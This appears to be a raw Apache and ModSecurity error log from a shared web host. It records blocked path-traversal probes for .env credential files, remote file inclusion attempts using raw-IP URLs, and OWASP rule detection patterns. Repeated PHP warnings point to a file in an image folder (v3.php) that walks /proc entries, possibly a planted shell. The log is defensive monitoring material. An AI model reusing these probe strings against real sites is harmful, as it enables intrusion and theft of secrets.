[Tue May 12 02:52:02.652801 2026] [:error] [pid 1730207:tid 1730223] [client 112.207.182.252:9927] File does not exist: /home/manhatta/public_html/xmlrpc.php
PHP Warning:  filesize(): stat failed for /proc/2415603/task/2415603/cwd in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  fileperms(): stat failed for /proc/2415603/task/2415603/cwd in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  filesize(): stat failed for /proc/2415603/task/2415603/exe in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  fileperms(): stat failed for /proc/2415603/task/2415603/exe in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  filesize(): stat failed for /proc/2415603/task/2415603/root in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  fileperms(): stat failed for /proc/2415603/task/2415603/root in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
[Tue May 12 02:53:18.306076 2026] [security2:error] [pid 1730207:tid 1730229] [client 43.130.139.177:43368] ModSecurity: Warning. Pattern match "\\\\b(keep-alive|close),\\\\s?(keep-alive|close)\\\\b" at REQUEST_HEADERS:Connection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "198"] [id "920210"] [rev "2"] [msg "Multiple/Conflicting Connection Header Data Found."] [data "keep-alive, close"] [severity "WARNING"] [ver "OWASP_CRS/3.0.0"] [maturity "6"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "cpanel.totalcloud.fr"] [uri "/"] [unique_id "agJ5_jue9Sp-pIv_Bb6SCgAAAVQ"]
[Tue May 12 02:53:21.190130 2026] [security2:error] [pid 1707624:tid 1707696] [client 193.58.104.14:56927] ModSecurity: Warning. Pattern match "\\\\b(keep-alive|close),\\\\s?(keep-alive|close)\\\\b" at REQUEST_HEADERS:Connection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "198"] [id "920210"] [rev "2"] [msg "Multiple/Conflicting Connection Header Data Found."] [data "keep-alive, close"] [severity "WARNING"] [ver "OWASP_CRS/3.0.0"] [maturity "6"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agJ6AbOxS7i6i_mT2NLJnQAAAE4"], referer: https://www.piregwan-genesis.com/
PHP Warning:  filesize(): stat failed for /proc/33/task/33/cwd in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  fileperms(): stat failed for /proc/33/task/33/cwd in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  filesize(): stat failed for /proc/33/task/33/exe in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  fileperms(): stat failed for /proc/33/task/33/exe in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  filesize(): stat failed for /proc/33/task/33/root in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  fileperms(): stat failed for /proc/33/task/33/root in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
[Tue May 12 02:53:43.746011 2026] [security2:error] [pid 1707624:tid 1707686] [client 43.165.7.135:44330] ModSecurity: Warning. Pattern match "\\\\b(keep-alive|close),\\\\s?(keep-alive|close)\\\\b" at REQUEST_HEADERS:Connection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "198"] [id "920210"] [rev "2"] [msg "Multiple/Conflicting Connection Header Data Found."] [data "keep-alive, close"] [severity "WARNING"] [ver "OWASP_CRS/3.0.0"] [maturity "6"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "www.nearoo.fr"] [uri "/"] [unique_id "agJ6F7OxS7i6i_mT2NLJqgAAAEQ"]
[Tue May 12 02:54:56.921934 2026] [security2:error] [pid 1695975:tid 1695989] [client 34.234.200.207:12398] ModSecurity: Warning. Pattern match "^(?i)(?:file|ftps?|https?):\\\\/\\\\/(\\\\d{1,3}\\\\.\\\\d{1,3}\\\\.\\\\d{1,3}\\\\.\\\\d{1,3})" at ARGS:url. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-931-APPLICATION-ATTACK-RFI.conf"] [line "36"] [id "931100"] [rev "2"] [msg "Possible Remote File Inclusion (RFI) Attack: URL Parameter using IP Address"] [data "Matched Data: http://68.65.123.180 found within ARGS:url: http://68.65.123.180/"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "9"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-rfi"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agJ6YNVI9ymHBxup74-OCgAAAIs"]
[Tue May 12 02:54:56.922434 2026] [security2:error] [pid 1695975:tid 1695989] [client 34.234.200.207:12398] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agJ6YNVI9ymHBxup74-OCgAAAIs"]
[Tue May 12 02:54:56.922692 2026] [security2:error] [pid 1695975:tid 1695989] [client 34.234.200.207:12398] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=5,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): Possible Remote File Inclusion (RFI) Attack: URL Parameter using IP Address"] [tag "event-correlation"] [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agJ6YNVI9ymHBxup74-OCgAAAIs"]
[Tue May 12 02:55:01.296262 2026] [ssl:error] [pid 1709071:tid 1709091] (EAI 2)Name or service not known: [client 108.128.77.234:56686] AH01972: could not resolve address of OCSP responder r11.o.lencr.org
[Tue May 12 02:55:01.296335 2026] [ssl:error] [pid 1709071:tid 1709091] AH01941: stapling_renew_response: responder error
[Tue May 12 02:55:31.050565 2026] [core:error] [pid 1730207:tid 1730232] [client 145.239.10.137:46278] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace., referer: http://castiglionecorporatefinance.com/indexcard.php
[Tue May 12 02:55:31.050605 2026] [core:error] [pid 1730207:tid 1730232] [client 145.239.10.137:46278] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace., referer: http://castiglionecorporatefinance.com/indexcard.php
[Tue May 12 02:55:33.420089 2026] [security2:error] [pid 1707624:tid 1707685] [client 124.156.157.91:34208] ModSecurity: Warning. Pattern match "\\\\b(keep-alive|close),\\\\s?(keep-alive|close)\\\\b" at REQUEST_HEADERS:Connection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "198"] [id "920210"] [rev "2"] [msg "Multiple/Conflicting Connection Header Data Found."] [data "keep-alive, close"] [severity "WARNING"] [ver "OWASP_CRS/3.0.0"] [maturity "6"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "www.labaujue.com"] [uri "/on-parle-de-la-baujue/"] [unique_id "agJ6hbOxS7i6i_mT2NLJ4AAAAEM"]
[Tue May 12 02:55:55.408661 2026] [authz_core:error] [pid 1730175:tid 1730192] [client 17.241.75.109:38036] AH01630: client denied by server configuration: /home/krakouka/public_html/wp-includes/sodium_compat/lib/error_log
PHP Warning:  filesize(): stat failed for /proc/1704816/task/1815575/cwd in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  fileperms(): stat failed for /proc/1704816/task/1815575/cwd in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  filesize(): stat failed for /proc/1704816/task/1815575/exe in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  fileperms(): stat failed for /proc/1704816/task/1815575/exe in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  filesize(): stat failed for /proc/1704816/task/1815575/root in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  fileperms(): stat failed for /proc/1704816/task/1815575/root in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  filesize(): stat failed for /proc/1704816/task/2174133/cwd in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  fileperms(): stat failed for /proc/1704816/task/2174133/cwd in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  filesize(): stat failed for /proc/1704816/task/2174133/exe in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  fileperms(): stat failed for /proc/1704816/task/2174133/exe in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  filesize(): stat failed for /proc/1704816/task/2174133/root in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  fileperms(): stat failed for /proc/1704816/task/2174133/root in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
[Tue May 12 02:56:39.941451 2026] [security2:error] [pid 1709071:tid 1709105] [client 23.23.104.107:41172] ModSecurity: Warning. String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "452"] [id "920440"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".com"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "9"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "www.piregwan-genesis.com"] [uri "/liens/chatsexylive.com"] [unique_id "agJ6x7vMumyrWMfSu7qrpQAAANI"]
[Tue May 12 02:56:39.941812 2026] [security2:error] [pid 1709071:tid 1709105] [client 23.23.104.107:41172] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.piregwan-genesis.com"] [uri "/liens/chatsexylive.com"] [unique_id "agJ6x7vMumyrWMfSu7qrpQAAANI"]
[Tue May 12 02:56:39.942047 2026] [security2:error] [pid 1709071:tid 1709105] [client 23.23.104.107:41172] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): URL file extension is restricted by policy"] [tag "event-correlation"] [hostname "www.piregwan-genesis.com"] [uri "/liens/chatsexylive.com"] [unique_id "agJ6x7vMumyrWMfSu7qrpQAAANI"]
PHP Warning:  filesize(): stat failed for /proc/1704659/task/1704661/cwd in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  fileperms(): stat failed for /proc/1704659/task/1704661/cwd in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  filesize(): stat failed for /proc/1704659/task/1704661/exe in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  fileperms(): stat failed for /proc/1704659/task/1704661/exe in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  filesize(): stat failed for /proc/1704659/task/1704661/root in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  fileperms(): stat failed for /proc/1704659/task/1704661/root in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
[Tue May 12 02:57:31.414587 2026] [security2:error] [pid 1709071:tid 1709106] [client 35.168.238.50:55071] ModSecurity: Warning. Pattern match "^(?i)(?:file|ftps?|https?):\\\\/\\\\/(\\\\d{1,3}\\\\.\\\\d{1,3}\\\\.\\\\d{1,3}\\\\.\\\\d{1,3})" at ARGS:url. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-931-APPLICATION-ATTACK-RFI.conf"] [line "36"] [id "931100"] [rev "2"] [msg "Possible Remote File Inclusion (RFI) Attack: URL Parameter using IP Address"] [data "Matched Data: http://139.59.99.108 found within ARGS:url: http://139.59.99.108/"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "9"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-rfi"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agJ6-7vMumyrWMfSu7qrzgAAANM"]
[Tue May 12 02:57:31.415001 2026] [security2:error] [pid 1709071:tid 1709106] [client 35.168.238.50:55071] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agJ6-7vMumyrWMfSu7qrzgAAANM"]
[Tue May 12 02:57:31.415216 2026] [security2:error] [pid 1709071:tid 1709106] [client 35.168.238.50:55071] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=5,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): Possible Remote File Inclusion (RFI) Attack: URL Parameter using IP Address"] [tag "event-correlation"] [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agJ6-7vMumyrWMfSu7qrzgAAANM"]
[Tue May 12 02:57:36.707173 2026] [core:error] [pid 1730207:tid 1730221] [client 195.178.110.105:7110] AH10244: invalid URI path (/%2e%2e/%2e%2e/.env)
[Tue May 12 02:57:36.886479 2026] [core:error] [pid 1709071:tid 1709099] [client 195.178.110.105:6998] AH10244: invalid URI path (/storage/../../../.env)
[Tue May 12 02:57:36.888278 2026] [core:error] [pid 1707624:tid 1707706] [client 195.178.110.105:7022] AH10244: invalid URI path (/../.env)
[Tue May 12 02:57:37.735074 2026] [security2:error] [pid 1691274:tid 1691299] [client 129.226.152.67:50986] ModSecurity: Warning. Pattern match "\\\\b(keep-alive|close),\\\\s?(keep-alive|close)\\\\b" at REQUEST_HEADERS:Connection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "198"] [id "920210"] [rev "2"] [msg "Multiple/Conflicting Connection Header Data Found."] [data "keep-alive, close"] [severity "WARNING"] [ver "OWASP_CRS/3.0.0"] [maturity "6"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "rentparadise.fr"] [uri "/wp-json/"] [unique_id "agJ7AVfdQaraX_prmqchQgAAABg"]
[Tue May 12 02:57:39.334467 2026] [core:error] [pid 1707624:tid 1707689] [client 145.239.10.137:47012] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace., referer: http://castiglionecorporatefinance.com/files1bac.php
[Tue May 12 02:57:39.334496 2026] [core:error] [pid 1707624:tid 1707689] [client 145.239.10.137:47012] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace., referer: http://castiglionecorporatefinance.com/files1bac.php
[Tue May 12 02:58:19.056211 2026] [security2:error] [pid 1730207:tid 1730223] [client 74.7.242.15:33386] ModSecurity: Warning. Matched phrase "../" at REQUEST_URI. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "34"] [id "930110"] [rev "1"] [msg "Path Traversal Attack (/../)"] [data "Matched Data: ../ found within REQUEST_URI: /liens/r.../rappro.ru"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "7"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "www.piregwan-genesis.com"] [uri "/liens/r.../rappro.ru"] [unique_id "agJ7Kzue9Sp-pIv_Bb6SsAAAAU4"], referer: http://treasureillustrated.com
[Tue May 12 02:58:19.056283 2026] [security2:error] [pid 1730207:tid 1730223] [client 74.7.242.15:33386] ModSecurity: Warning. Matched phrase "../" at REQUEST_URI. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "34"] [id "930110"] [rev "1"] [msg "Path Traversal Attack (/../)"] [data "Matched Data: ../ found within REQUEST_URI: /liens/r.../rappro.ru"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "7"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "www.piregwan-genesis.com"] [uri "/liens/r.../rappro.ru"] [unique_id "agJ7Kzue9Sp-pIv_Bb6SsAAAAU4"], referer: http://treasureillustrated.com
[Tue May 12 02:58:19.056562 2026] [security2:error] [pid 1730207:tid 1730223] [client 74.7.242.15:33386] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 10)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.piregwan-genesis.com"] [uri "/liens/r.../rappro.ru"] [unique_id "agJ7Kzue9Sp-pIv_Bb6SsAAAAU4"], referer: http://treasureillustrated.com
[Tue May 12 02:58:19.057342 2026] [security2:error] [pid 1730207:tid 1730223] [client 74.7.242.15:33386] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 10 - SQLI=0,XSS=0,RFI=0,LFI=10,RCE=0,PHPI=0,HTTP=0,SESS=0): Path Traversal Attack (/../)"] [tag "event-correlation"] [hostname "www.piregwan-genesis.com"] [uri "/liens/r.../rappro.ru"] [unique_id "agJ7Kzue9Sp-pIv_Bb6SsAAAAU4"], referer: http://treasureillustrated.com
[Tue May 12 02:58:21.464131 2026] [authz_core:error] [pid 1707624:tid 1707693] [client 52.167.144.214:48076] AH01630: client denied by server configuration: /home/labaujue/public_html/wp-includes/Requests/error_log
[Tue May 12 02:58:31.430803 2026] [security2:error] [pid 1709071:tid 1709088] [client 43.165.198.224:50808] ModSecurity: Warning. Pattern match "\\\\b(keep-alive|close),\\\\s?(keep-alive|close)\\\\b" at REQUEST_HEADERS:Connection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "198"] [id "920210"] [rev "2"] [msg "Multiple/Conflicting Connection Header Data Found."] [data "keep-alive, close"] [severity "WARNING"] [ver "OWASP_CRS/3.0.0"] [maturity "6"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "rixonephotography.com"] [uri "/contact/"] [unique_id "agJ7N7vMumyrWMfSu7qsBgAAAME"]
[Tue May 12 02:58:36.405964 2026] [security2:error] [pid 1730207:tid 1730219] [client 3.216.13.10:1766] ModSecurity: Warning. String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "452"] [id "920440"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".com"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "9"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.phpurl=https:/vanbuomhanoi.com"] [unique_id "agJ7PDue9Sp-pIv_Bb6StQAAAUo"]
[Tue May 12 02:58:36.406340 2026] [security2:error] [pid 1730207:tid 1730219] [client 3.216.13.10:1766] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.phpurl=https:/vanbuomhanoi.com"] [unique_id "agJ7PDue9Sp-pIv_Bb6StQAAAUo"]
[Tue May 12 02:58:36.406579 2026] [security2:error] [pid 1730207:tid 1730219] [client 3.216.13.10:1766] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): URL file extension is restricted by policy"] [tag "event-correlation"] [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.phpurl=https:/vanbuomhanoi.com"] [unique_id "agJ7PDue9Sp-pIv_Bb6StQAAAUo"]
[Tue May 12 02:59:13.402007 2026] [:error] [pid 1709071:tid 1709093] [client 66.249.75.165:58160] File does not exist: /home/domaine1/public_html/erreur.php
[Tue May 12 02:59:21.171789 2026] [security2:error] [pid 1709071:tid 1709092] [client 43.155.195.141:51270] ModSecurity: Warning. Pattern match "\\\\b(keep-alive|close),\\\\s?(keep-alive|close)\\\\b" at REQUEST_HEADERS:Connection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "198"] [id "920210"] [rev "2"] [msg "Multiple/Conflicting Connection Header Data Found."] [data "keep-alive, close"] [severity "WARNING"] [ver "OWASP_CRS/3.0.0"] [maturity "6"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "www.maelbailly.fr"] [uri "/wp-json/wp/v2/pieces/439"] [unique_id "agJ7abvMumyrWMfSu7qsIgAAAMU"]
PHP Warning:  filesize(): stat failed for /proc/1704659/task/1704659/cwd in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  fileperms(): stat failed for /proc/1704659/task/1704659/cwd in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  filesize(): stat failed for /proc/1704659/task/1704659/exe in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  fileperms(): stat failed for /proc/1704659/task/1704659/exe in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  filesize(): stat failed for /proc/1704659/task/1704659/root in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  fileperms(): stat failed for /proc/1704659/task/1704659/root in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
[Tue May 12 02:59:39.666076 2026] [ssl:error] [pid 1730175:tid 1730194] (EAI 2)Name or service not known: [client 66.249.75.38:52546] AH01972: could not resolve address of OCSP responder r3.o.lencr.org
[Tue May 12 02:59:39.668317 2026] [ssl:error] [pid 1730175:tid 1730194] AH01941: stapling_renew_response: responder error
[Tue May 12 02:59:40.135178 2026] [ssl:error] [pid 1730207:tid 1730213] (EAI 2)Name or service not known: [client 66.249.75.37:64738] AH01972: could not resolve address of OCSP responder r3.o.lencr.org
[Tue May 12 02:59:40.135391 2026] [ssl:error] [pid 1730207:tid 1730213] AH01941: stapling_renew_response: responder error
PHP Warning:  filesize(): stat failed for /proc/1704816/task/1705478/cwd in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  fileperms(): stat failed for /proc/1704816/task/1705478/cwd in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  filesize(): stat failed for /proc/1704816/task/1705478/exe in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  fileperms(): stat failed for /proc/1704816/task/1705478/exe in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  filesize(): stat failed for /proc/1704816/task/1705478/root in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  fileperms(): stat failed for /proc/1704816/task/1705478/root in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
[Tue May 12 03:00:36.073751 2026] [security2:error] [pid 1730207:tid 1730216] [client 43.156.34.42:60552] ModSecurity: Warning. Pattern match "\\\\b(keep-alive|close),\\\\s?(keep-alive|close)\\\\b" at REQUEST_HEADERS:Connection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "198"] [id "920210"] [rev "2"] [msg "Multiple/Conflicting Connection Header Data Found."] [data "keep-alive, close"] [severity "WARNING"] [ver "OWASP_CRS/3.0.0"] [maturity "6"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "of-crystal-lake.net"] [uri "/page.php"] [unique_id "agJ7tDue9Sp-pIv_Bb6S8gAAAUc"]
